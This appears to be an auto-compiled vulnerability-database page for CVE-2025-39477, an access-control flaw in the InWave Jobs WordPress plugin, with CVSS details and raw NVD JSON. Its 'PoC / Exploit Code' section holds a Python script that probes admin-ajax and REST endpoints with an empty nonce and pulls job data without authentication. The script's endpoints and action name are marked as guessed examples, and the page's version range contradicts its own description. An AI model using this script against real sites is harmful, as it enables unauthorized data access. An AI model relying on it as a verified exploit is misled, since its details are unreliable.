Security Vulnerability Report
中文
CVE-2025-39477 CVSS 9.8 CRITICAL

CVE-2025-39477

Published: 2026-01-06 17:15:44
Last Modified: 2026-04-28 19:32:00

Description

Missing Authorization vulnerability in Sfwebservice InWave Jobs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects InWave Jobs: from n/a through 3.5.8.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

InWave Jobs (iwjob) < 3.5.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-39477 PoC - InWave Jobs Authorization Bypass # Target: WordPress site with InWave Jobs plugin < 3.5.8 def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-39477""" # Vulnerable endpoints (examples) endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/iwjob/v1/jobs", "/wp-json/iwjob/v1/settings" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded" } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-39477 - InWave Jobs Authorization Bypass\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint # Test unauthenticated access to admin functions data = { "action": "iwjob_admin_action", # Example admin action "_wpnonce": "", # Empty nonce to test bypass } try: response = requests.post(url, data=data, headers=headers, timeout=10) # Check for successful unauthorized access if response.status_code == 200: if "success" in response.text or "nonce" not in response.text: print(f"[+] VULNERABLE: {url}") print(f"[+] Status: {response.status_code}") print(f"[+] Response preview: {response.text[:200]}...") return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {url}: {e}") print("[-] Target may not be vulnerable or plugin not installed") return False def exploit_data_exposure(target_url): """Exploit: Extract job data without authentication""" url = f"{target_url.rstrip('/')}/wp-json/iwjob/v1/jobs" try: response = requests.get(url, timeout=10) if response.status_code == 200: print(f"\n[+] Successfully extracted job data:") print(response.text[:500]) except: pass if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print("Usage: python cve-2025-39477.py <target_url>") print("Example: python cve-2025-39477.py http://example.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-39477", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:43.930", "lastModified": "2026-04-28T19:32:00.297", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Sfwebservice InWave Jobs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects InWave Jobs: from n/a through 3.5.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/iwjob/vulnerability/wordpress-inwave-jobs-plugin-3-5-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}